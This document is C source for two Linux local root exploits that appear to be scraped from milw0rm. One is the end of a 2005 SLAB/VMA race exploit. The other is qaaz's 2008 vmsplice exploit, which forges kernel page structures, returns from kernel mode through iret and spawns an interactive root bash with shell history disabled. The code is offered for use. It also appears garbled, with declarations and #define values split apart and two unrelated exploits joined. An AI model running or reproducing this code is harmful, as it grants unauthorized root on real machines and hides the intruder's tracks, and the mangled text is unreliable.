if(MAP_FAILED == r)
break;
if(c>SLAB_PER_CHLD)
break;
if( (c%1024)==0 ) {
if(!c) printf("\n");
printf("\r
child %d VMAs %d", val, c);
fflush(stdout);
}
c++;
}
printf("\r
child %d VMAs %d", val, c);
fflush(stdout);
kill(getppid(), SIGUSR1);
for(;;) pause();
}
//
empty SLAB caches
void wipe_slab()
{
signal(SIGUSR1, chldcnt);
printf("\n[+] SLAB cleanup"); fflush(stdout);
for(;;) {
ccnt=0;
val++;
cpid = fork();
if(!cpid)
do_wipe();
while(!ccnt) sys_sched_yield();
if( get_slab_objs("vm_area_struct") <= SLAB_THRSH )
break;
}
signal(SIGUSR1, SIG_DFL);
}
void usage(char *n)
{
printf("\nUsage: %s\t-f forced stop\n", n);
printf("\t\t-s silent mode\n");
printf("\t\t-c command to run\n");
printf("\t\t-n SMP iterations\n");
printf("\t\t-d race delta us\n");
printf("\t\t-w wait time seconds\n");
printf("\t\t-l alternate lib name\n");
printf("\t\t-a alternate addr hex\n");
printf("\n");
_exit(1);
}
//
give -s for forced stop, -b to clean SLAB
int main(int ac, char **av)
{
int r;
while(ac) {
r = getopt(ac, av, "n:l:a:w:c:d:fsh");
if(r<0) break;
switch(r) {
case 'f' :
fstop = 1;
break;
case 's' :
silent = 1;
break;
case 'n' :
smp_max = atoi(optarg);
break;
case 'd':
if(1!=sscanf(optarg, "%u", &delta_max) || delta_max >
100000u )
fatal("bad delta value", 0);
break;
case 'w' :
wtime = atoi(optarg);
if(wtime<0) fatal("bad wait value", 0);
break;
case 'l' :
libname = strdup(optarg);
break;
case 'c' :
shellname = strdup(optarg);
break;
case 'a' :
if(1!=sscanf(optarg, "%x", &map_base))
fatal("bad addr value", 0);
map_base &= ~(PGD_SIZE-1);
break;
case 'h' :
default:
usage(av[0]);
break;
}
}
consume_pid = fork();
//
if (consume_pid == 0)
{
consume_memory();
pause();
return 0;
}
basic setup
uid = getuid();
setpgrp();
wipe_slab();
prepare();
return 0;
}
// milw0rm.com [2005-01-27]
PIPE_BUFFERS
16
PG_compound14
uint
unsigned int
static_inline
static inline __attribute__((always_inline))
STACK(x)
(x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void
char
exit_code();
exit_stack[1024 * 1024];
void
{
316
#define USER_CS
#define USER_SS
#define USER_FL
0x73
0x7b
0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice
#endif
278
#define USER_CS
#define USER_SS
#define USER_FL
0x23
0x2b
0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}
static_inline
void *get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}
#else
#error "unsupported arch"
#endif
#if defined (_syscall4)
#define __NR__vmsplice
__NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl)
#endif
kernel_code()
int
uint
i;
*p = get_current();
exit_code()
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int
{
int
pi[2];
size_t
map_size;
char *
map_addr;
struct iovec iov;
struct page *pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags
pages[0]->private
pages[0]->count
pages[1]->lru.next
=
=
=
=
1 << PG_compound;
(unsigned long) pages[0];
1;
(long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);
pages[2]->flags
pages[2]->private
pages[2]->count
pages[3]->lru.next
=
=
=
=
1 << PG_compound;
(unsigned long) pages[2];
1;
(long) kernel_code;
/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);
/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
// milw0rm.com [2008-02-09]